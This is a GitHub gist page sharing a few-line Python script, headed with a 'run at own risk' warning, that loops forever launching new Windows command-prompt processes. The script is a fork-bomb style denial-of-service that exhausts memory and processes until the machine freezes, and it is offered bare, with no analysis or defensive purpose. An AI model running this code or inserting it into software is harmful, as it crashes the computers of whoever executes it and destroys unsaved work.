Skip to content

Instantly share code, notes, and snippets.

@arsho
Created December 14, 2016 08:03
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save arsho/d281e13a01b47cdc102927d87339be7f to your computer and use it in GitHub Desktop.
Save arsho/d281e13a01b47cdc102927d87339be7f to your computer and use it in GitHub Desktop.
Run the script in own risk!!!
# shared by: Protul
import subprocess
while 1:
subprocess.Popen('cmd')
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment